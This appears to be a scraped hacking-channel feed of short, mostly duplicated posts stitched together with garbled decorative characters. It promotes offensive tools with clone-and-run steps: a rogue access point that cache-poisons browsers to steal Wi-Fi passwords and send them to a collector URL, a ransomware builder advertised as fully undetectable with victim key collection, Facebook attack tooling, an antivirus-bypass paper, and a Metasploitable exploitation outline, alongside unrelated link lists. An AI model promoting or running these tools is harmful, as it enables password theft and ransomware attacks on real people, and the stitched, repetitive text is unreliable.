How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code.pdf
495.3 KB
Introduction
v4.8 of the dotnet framework uses Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP) to block potentially unwanted software running from memory. WLDP will verify the digital signature of dynamic code while AMSI will scan for software that is either harmful or blocked by the administrator. This post documents three publiclyknown methods red teams currently use to bypass AMSI and one to bypass WLDP. The bypass methods described are somewhat generic and donβt require any special knowledge. If youβre reading this post anytime after June 2019, the methods may no longer work. The research shown here was conducted in collaboration with TheWover.
v4.8 of the dotnet framework uses Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP) to block potentially unwanted software running from memory. WLDP will verify the digital signature of dynamic code while AMSI will scan for software that is either harmful or blocked by the administrator. This post documents three publiclyknown methods red teams currently use to bypass AMSI and one to bypass WLDP. The bypass methods described are somewhat generic and donβt require any special knowledge. If youβre reading this post anytime after June 2019, the methods may no longer work. The research shown here was conducted in collaboration with TheWover.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WIRELESS HACKING:
Dribble is a project I developed to play with my Raspberry Pie. The purpose of dribble is to stealing Wi-Fi passwords by exploiting web browser's cache. Dribble creates a fake Wi-Fi access point and waits for clients to connect to it. When clients connects, dribble intercepts every HTTP requests performed to JavaScript pages and injects a malicious JavaScipt code. The malicious JavaScript code is cached so that it persists when clients disconnect. When clients disconnect and reconnect back to their home router, the malicious JavaScript code activates, steals the Wi-Fi password from the router and send it back to the attacker.
Requirements:
hostapd
dnsmasq
node.js
bettercap
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Download and run
To run dribble, just download the repo and run it as root.
1) git clone https://github.com/rhaidiz/dribble
2) cd dribble
3) sudo ./dribble
Configuration
4) All the configuration you need is located in the config file:
# the internet interface
internet=eth0
# the wifi interface
phy=wlan0
# The ESSID
essid="TEST"
# collector
collector="http://rhaidiz.net/something"
# the routers' IPs
routerips=("192.168.0.1/24" "10.0.0.1/24")
# usernames dictionary
usernames="['admin', 'admin1', 'test']"
# passwords dictionaris
passwords="['admin', 'admin1', 'password']"
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WIRELESS HACKING:
Dribble is a project I developed to play with my Raspberry Pie. The purpose of dribble is to stealing Wi-Fi passwords by exploiting web browser's cache. Dribble creates a fake Wi-Fi access point and waits for clients to connect to it. When clients connects, dribble intercepts every HTTP requests performed to JavaScript pages and injects a malicious JavaScipt code. The malicious JavaScript code is cached so that it persists when clients disconnect. When clients disconnect and reconnect back to their home router, the malicious JavaScript code activates, steals the Wi-Fi password from the router and send it back to the attacker.
Requirements:
hostapd
dnsmasq
node.js
bettercap
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Download and run
To run dribble, just download the repo and run it as root.
1) git clone https://github.com/rhaidiz/dribble
2) cd dribble
3) sudo ./dribble
Configuration
4) All the configuration you need is located in the config file:
# the internet interface
internet=eth0
# the wifi interface
phy=wlan0
# The ESSID
essid="TEST"
# collector
collector="http://rhaidiz.net/something"
# the routers' IPs
routerips=("192.168.0.1/24" "10.0.0.1/24")
# usernames dictionary
usernames="['admin', 'admin1', 'test']"
# passwords dictionaris
passwords="['admin', 'admin1', 'password']"
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - rhaidiz/dribble: Stealing Wi-Fi passwords via browser's cache poisoning.
Stealing Wi-Fi passwords via browser's cache poisoning. - rhaidiz/dribble
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦GAME HACKING APPS FOR ANDROID :
https://xmodgames.download
https://hackerbot.net/software/444-hackerbot-download
https://sbgamehacker.download/apk/
https://creehack.net
https://gameguardian.net/download
https://gamecihworld.puzl.com
https://www.luckypatchers.com/lucky-patcher-6-0-7-apk/
http://leoplaycard.info
https://gamekiller.co
https://latestmodapks.com/download-freedom-apk-latest/
https://play.google.com/store/apps/details?id=com.acr.rootfilemanager&hl=en_IN
USE FOR OFFLINE GAMES (LEGAL) :)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦GAME HACKING APPS FOR ANDROID :
https://xmodgames.download
https://hackerbot.net/software/444-hackerbot-download
https://sbgamehacker.download/apk/
https://creehack.net
https://gameguardian.net/download
https://gamecihworld.puzl.com
https://www.luckypatchers.com/lucky-patcher-6-0-7-apk/
http://leoplaycard.info
https://gamekiller.co
https://latestmodapks.com/download-freedom-apk-latest/
https://play.google.com/store/apps/details?id=com.acr.rootfilemanager&hl=en_IN
USE FOR OFFLINE GAMES (LEGAL) :)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Techylist
Xmodgames - Download Xmod Apk For Android (Official)
People have been playing games like Clash of Clans, Minecraft, Clash Royale, Asphalt 8, Mortal Combat, etc. for such a long time that, most of them become dull. This is probably because the game is small or it is very hard after a certain level. So in suchβ¦
Forwarded from UNDERCODE NEWS
After fined Google 9.7 billion US dollars, the EU exaggerated Google: shopping search is not bad
#International
_
#International
_
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦all trusted websites 2020 for buying bitcoin :
https://bitcoin.org/en/buy
www.luno.com
www.coinbase.com
www.shakepay.com
www.altcointrader.co.za
Localbitcoin.com
www.belfrics.io
www.bitpesa.com
www.remitano.com
www.spectrocoin.com
www.flux.com
www.altcointrader.co.za
www.coinmama.com
www.cex.io
www.coinmama.com
www.altcointrader.co.za
www.golix.com
www.spectrocoin.com
www.luno.com
www.worldwidebitcoin.com
www.localbitcoins.com
https://bit2me.com/
www.blockchain.com
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦all trusted websites 2020 for buying bitcoin :
https://bitcoin.org/en/buy
www.luno.com
www.coinbase.com
www.shakepay.com
www.altcointrader.co.za
Localbitcoin.com
www.belfrics.io
www.bitpesa.com
www.remitano.com
www.spectrocoin.com
www.flux.com
www.altcointrader.co.za
www.coinmama.com
www.cex.io
www.coinmama.com
www.altcointrader.co.za
www.golix.com
www.spectrocoin.com
www.luno.com
www.worldwidebitcoin.com
www.localbitcoins.com
https://bit2me.com/
www.blockchain.com
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
bitcoin.org
Buy Bitcoin
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME FREE SMS APPLICATIONS :
http://www.chompsms.com/
https://play.google.com/store/apps/details?id=com.jb.gosms
http://www.handcent.com/
https://mightytext.net/
http://www.mysms.com/
https://play.google.com/store/apps/details?id=com.moez.QKSMS
http://www.textra.me/
textnow.com & textplus & nextplus...by watch videos..
verified from 1 month
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME FREE SMS APPLICATIONS :
http://www.chompsms.com/
https://play.google.com/store/apps/details?id=com.jb.gosms
http://www.handcent.com/
https://mightytext.net/
http://www.mysms.com/
https://play.google.com/store/apps/details?id=com.moez.QKSMS
http://www.textra.me/
textnow.com & textplus & nextplus...by watch videos..
verified from 1 month
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Chompsms
Chomp SMS - The antidote to boring texting...
An ultra-customizable alternative to your stock Android SMS / MMS app
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
#Web Hacking new
[Hack This Site!](https://www.hackthissite.org/) - a free, safe and legal training ground for hackers to test and expand their hacking skills
[Hack The Box](https://www.hackthebox.eu) - a free site to perform pentesting in a variety of different systems.
[Webhacking.kr](http://webhacking.kr/)
[0xf.at](https://0xf.at/) - a website without logins or ads where you can solve password-riddles (so called hackits).
[Gruyere](https://google-gruyere.appspot.com/)
[Others](https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps)
https://github.com/Manisso/fsociety
https://github.com/sundowndev/hacker-roadmap
https://github.com/infoslack/awesome-web-hacking
https://github.com/LyleMi/Learn-Web-Hacking
https://github.com/nil0x42/phpsploit
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
#Web Hacking new
[Hack This Site!](https://www.hackthissite.org/) - a free, safe and legal training ground for hackers to test and expand their hacking skills
[Hack The Box](https://www.hackthebox.eu) - a free site to perform pentesting in a variety of different systems.
[Webhacking.kr](http://webhacking.kr/)
[0xf.at](https://0xf.at/) - a website without logins or ads where you can solve password-riddles (so called hackits).
[Gruyere](https://google-gruyere.appspot.com/)
[Others](https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps)
https://github.com/Manisso/fsociety
https://github.com/sundowndev/hacker-roadmap
https://github.com/infoslack/awesome-web-hacking
https://github.com/LyleMi/Learn-Web-Hacking
https://github.com/nil0x42/phpsploit
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
www.hackthissite.org
HackThisSite.org is a free, safe and legal training ground for hackers to test and expand their ethical hacking skills with challenges, CTFs, and more.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦RANSOMWARES Sources:
Excellent CryptoWall 3.0 Writeup: http://blog.brillantit.com/?p=15
CryptoWall 3.0 Writeup: http://www.sentinelone.com/blog/anatomy-of-cryptowall-3-0-a-look-inside-ransomwares-tactics/
Chimera Ransomware: https://threatpost.com/chimera-ransomware-promises-to-publish-encrypted-data-online/115293/
CryptoWall message text used came from https://www.pcrisk.com/removal-guides/7844-cryptowall-virus
CryptoWall 4.0: http://securityaffairs.co/wordpress/41718/cyber-crime/cryptowall-4-0-released.html
CryptoWall 4.0 DECRYPT.html: http://www.bleepstatic.com/images/news/ransomware/cryptowall/v4/note-part-1.jpg
Talos CryptoWall 4.0 Report: http://blog.talosintel.com/2015/12/cryptowall-4.html
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦RANSOMWARES Sources:
Excellent CryptoWall 3.0 Writeup: http://blog.brillantit.com/?p=15
CryptoWall 3.0 Writeup: http://www.sentinelone.com/blog/anatomy-of-cryptowall-3-0-a-look-inside-ransomwares-tactics/
Chimera Ransomware: https://threatpost.com/chimera-ransomware-promises-to-publish-encrypted-data-online/115293/
CryptoWall message text used came from https://www.pcrisk.com/removal-guides/7844-cryptowall-virus
CryptoWall 4.0: http://securityaffairs.co/wordpress/41718/cyber-crime/cryptowall-4-0-released.html
CryptoWall 4.0 DECRYPT.html: http://www.bleepstatic.com/images/news/ransomware/cryptowall/v4/note-part-1.jpg
Talos CryptoWall 4.0 Report: http://blog.talosintel.com/2015/12/cryptowall-4.html
β β β Uππ»βΊπ«Δπ¬πβ β β β
SentinelOne
Anatomy of CryptoWall 3.0 β a look inside ransomwareβs tactics
CryptoWall is a new and highly destructive variant of ransomware. Ransomware is malicious software (malware) that infects your computer and holds hostage something of value to you in exchange for money.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Automate your work : Evil operator for evaluating codes, translating text,
taking notes, searching via google, etc.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Dewdrops/evil-extra-operator.git
2) cd evil-extra-operator
3) ;; change default key bindings (if you want) HERE
;; (setq evil-extra-operator-eval-key (kbd "ge"))
(require 'evil-extra-operator)
(global-evil-extra-operator-mode 1)
4) The key binding customization must be placed BEFORE (require 'evil-extra-operator).
5) Or you can just choose what commands you need and bind them yourself:
6) (require 'evil-extra-operator)
(define-key evil-motion-state-map "gr" 'evil-operator-eval)
(define-key evil-motion-state-map "g'" 'evil-operator-google-translate)
Commands and default bindings
1) gr (evil-operator-eval)
Operator for evaluating code, i.e., use grip to evaluate current paragraph, grr to evaluate current line, or if you are in visual state, gr to evaluate current active region. You can customize option evil-extra-operator-eval-modes-alist to let evil-operator-eval support more language. Example:
(setq evil-extra-operator-eval-modes-alist
'((ruby-mode ruby-send-region)
(enh-ruby-mode ruby-send-region)))
2) gG (evil-operator-google-search)
Operator to search the web via google.
g. (evil-operator-google-translate)
3) Operator to translate text via google translate. To use this command, you should have google-translate installed.
gh (evil-operator-highlight)
4) Operator to highlight region. To use this command, you should have highlight.el installed. You can use hlt-eraser-mouse or hlt-eraser which are provided by highlight.el to erase highlighted area.
gs (evil-operator-fold)
5) Operator to fold region. To use this command, you should have fold-this.el installed. You can use fold-this-unfold-at-point or fold-this-unfold-all which are provided by fold-this.el for unfolding.
go (evil-operator-org-capture)
6) Operator form of org-capture. So you can use goip to capture current paragraph.
gR (evil-operator-remember)
7) Like evil-operator-org-capture, but use remember-region instead of org-capture.
No default binding (evil-operator-query-replace)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Automate your work : Evil operator for evaluating codes, translating text,
taking notes, searching via google, etc.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Dewdrops/evil-extra-operator.git
2) cd evil-extra-operator
3) ;; change default key bindings (if you want) HERE
;; (setq evil-extra-operator-eval-key (kbd "ge"))
(require 'evil-extra-operator)
(global-evil-extra-operator-mode 1)
4) The key binding customization must be placed BEFORE (require 'evil-extra-operator).
5) Or you can just choose what commands you need and bind them yourself:
6) (require 'evil-extra-operator)
(define-key evil-motion-state-map "gr" 'evil-operator-eval)
(define-key evil-motion-state-map "g'" 'evil-operator-google-translate)
Commands and default bindings
1) gr (evil-operator-eval)
Operator for evaluating code, i.e., use grip to evaluate current paragraph, grr to evaluate current line, or if you are in visual state, gr to evaluate current active region. You can customize option evil-extra-operator-eval-modes-alist to let evil-operator-eval support more language. Example:
(setq evil-extra-operator-eval-modes-alist
'((ruby-mode ruby-send-region)
(enh-ruby-mode ruby-send-region)))
2) gG (evil-operator-google-search)
Operator to search the web via google.
g. (evil-operator-google-translate)
3) Operator to translate text via google translate. To use this command, you should have google-translate installed.
gh (evil-operator-highlight)
4) Operator to highlight region. To use this command, you should have highlight.el installed. You can use hlt-eraser-mouse or hlt-eraser which are provided by highlight.el to erase highlighted area.
gs (evil-operator-fold)
5) Operator to fold region. To use this command, you should have fold-this.el installed. You can use fold-this-unfold-at-point or fold-this-unfold-all which are provided by fold-this.el for unfolding.
go (evil-operator-org-capture)
6) Operator form of org-capture. So you can use goip to capture current paragraph.
gR (evil-operator-remember)
7) Like evil-operator-org-capture, but use remember-region instead of org-capture.
No default binding (evil-operator-query-replace)
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
Dewdrops/evil-extra-operator
Evil operator for evaluating codes, translating text, taking notes, searching via google, etc. - Dewdrops/evil-extra-operator
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FACEBOOK PENTESTING :
The New version OFFICIAL FBHT V3
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) download or clone
https://github.com/chinoogawa/fbht/archive/V3.0.zip
https://github.com/chinoogawa/fbht/archive/V3.0.tar.gz
2) fbht$:- python setup.py
/usr/lib/python2.7/distutils/dist.py:267
3) usage: setup.py [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]
or: setup.py --help [cmd1 cmd2 ...]
or: setup.py --help-commands
or: setup.py cmd --help
R E Q U I R E M E N T S :
Selenium
Matplotlib-1.2.1
Networkx-1.8.1
Numpy-1.7.1
Pygraphviz-1.1
Simplejson-3.3.0
Mechanize-0.2.5
Other: gephi-0.8.2-beta (Graphs software)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FACEBOOK PENTESTING :
The New version OFFICIAL FBHT V3
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) download or clone
https://github.com/chinoogawa/fbht/archive/V3.0.zip
https://github.com/chinoogawa/fbht/archive/V3.0.tar.gz
2) fbht$:- python setup.py
/usr/lib/python2.7/distutils/dist.py:267
3) usage: setup.py [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]
or: setup.py --help [cmd1 cmd2 ...]
or: setup.py --help-commands
or: setup.py cmd --help
R E Q U I R E M E N T S :
Selenium
Matplotlib-1.2.1
Networkx-1.8.1
Numpy-1.7.1
Pygraphviz-1.1
Simplejson-3.3.0
Mechanize-0.2.5
Other: gephi-0.8.2-beta (Graphs software)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NUCLEAR RANSOMWARE :)new update/more features
F E A T U R E S :
Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extention instead
of encrypting the files)
Multiple encryption methods
Select file extentions to target
Decide if payload should self-destruct (Console mode feature
only)
Decide wich drive to target for encryption (working directory)
Verified server access through port forwarding VPN
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/leonv024/RAASNet.git
2) pip3 install -r requirements.txt
3) python3 RAASNet.py
On Linux, you might need to install these packages:
4) sudo apt install python3-tk python3-pil python3-pil.imagetk
5) Testing connection with remote server:
6) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
7) python3 test_socket.py
8)video https://github.com/leonv024/RAASNet/blob/master/demo/PyCrypto-vs-PyAES_demo_10fps.gif
U S E F O R L E A R N
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NUCLEAR RANSOMWARE :)new update/more features
F E A T U R E S :
Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extention instead
of encrypting the files)
Multiple encryption methods
Select file extentions to target
Decide if payload should self-destruct (Console mode feature
only)
Decide wich drive to target for encryption (working directory)
Verified server access through port forwarding VPN
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/leonv024/RAASNet.git
2) pip3 install -r requirements.txt
3) python3 RAASNet.py
On Linux, you might need to install these packages:
4) sudo apt install python3-tk python3-pil python3-pil.imagetk
5) Testing connection with remote server:
6) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
7) python3 test_socket.py
8)video https://github.com/leonv024/RAASNet/blob/master/demo/PyCrypto-vs-PyAES_demo_10fps.gif
U S E F O R L E A R N
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Guide on Metasploitable 2.pdf
2.4 MB
Exploiting Port 22 SSH Bruteforce Port 22 SSH (RSA Method)
Exploiting port 23 TELNET (Credential Capture) Exploiting
TELNET (Bruteforce) Port 25 SMTP User Enumeration
Exploiting Port 80 (PHP) Exploiting Port 139 & 445 (Samba)
Exploiting Port 8080 (Java) Exploiting Port 5432 (Postgres)
Exploiting Port 6667 (UnrealIRCD) Exploiting Port 36255
Remote Login Exploitation Remote Shell Exploitation
Exploiting Port 8787 Bindshell Exploiting Port 5900 (VNC)
Access Port 2121 (ProFTPD) Exploiting Port 8180 (Apache
Tomcat) Privilege Escalation via NFS Exploiting Port 3306 (MYSQL)
Network Scan Exploiting Port 21 FTP (Hydra) Exploiting VSFTPD 2.3.4
β β β Uππ»βΊπ«Δπ¬πβ β β β
Exploiting port 23 TELNET (Credential Capture) Exploiting
TELNET (Bruteforce) Port 25 SMTP User Enumeration
Exploiting Port 80 (PHP) Exploiting Port 139 & 445 (Samba)
Exploiting Port 8080 (Java) Exploiting Port 5432 (Postgres)
Exploiting Port 6667 (UnrealIRCD) Exploiting Port 36255
Remote Login Exploitation Remote Shell Exploitation
Exploiting Port 8787 Bindshell Exploiting Port 5900 (VNC)
Access Port 2121 (ProFTPD) Exploiting Port 8180 (Apache
Tomcat) Privilege Escalation via NFS Exploiting Port 3306 (MYSQL)
Network Scan Exploiting Port 21 FTP (Hydra) Exploiting VSFTPD 2.3.4
β β β Uππ»βΊπ«Δπ¬πβ β β β